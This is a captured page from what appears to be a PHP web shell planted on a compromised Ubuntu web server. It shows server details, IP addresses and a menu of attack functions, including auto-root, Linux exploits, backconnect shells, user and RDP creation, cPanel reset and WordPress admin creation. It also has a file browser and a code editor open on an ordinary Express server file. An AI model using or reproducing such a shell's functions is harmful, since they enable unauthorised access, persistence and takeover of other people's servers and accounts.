Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sms-core-ui-code /
server /
[ HOME SHELL ]
Name
Size
Permission
Action
middlewares
[ DIR ]
drwxrwxr-x
argv.js
61
B
-rwxrwxr-x
index.js
1.52
KB
-rwxrwxr-x
logger.js
1.08
KB
-rwxrwxr-x
port.js
105
B
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.js
/* eslint consistent-return:0 import/order:0 */ const express = require('express'); const logger = require('./logger'); const argv = require('./argv'); const port = require('./port'); const setup = require('./middlewares/frontendMiddleware'); const isDev = process.env.NODE_ENV !== 'production'; const ngrok = (isDev && process.env.ENABLE_TUNNEL) || argv.tunnel ? require('ngrok') : false; const { resolve } = require('path'); const app = express(); // If you need a backend, e.g. an API, add your custom backend-specific middleware here // app.use('/api', myApi); // In production we need to pass these values in instead of relying on webpack setup(app, { outputPath: resolve(process.cwd(), 'build'), publicPath: '/', }); // get the intended host and port number, use localhost and port 3000 if not provided const customHost = argv.host || process.env.HOST; const host = customHost || null; // Let http.Server use its default IPv6/4 host const prettyHost = customHost || 'localhost'; // use the gzipped bundle app.get('*.js', (req, res, next) => { req.url = req.url + '.gz'; // eslint-disable-line res.set('Content-Encoding', 'gzip'); next(); }); // Start your app. app.listen(port, host, async err => { if (err) { return logger.error(err.message); } // Connect to ngrok in dev mode if (ngrok) { let url; try { url = await ngrok.connect(port); } catch (e) { return logger.error(e); } logger.appStarted(port, prettyHost, url); } else { logger.appStarted(port, prettyHost); } });
Close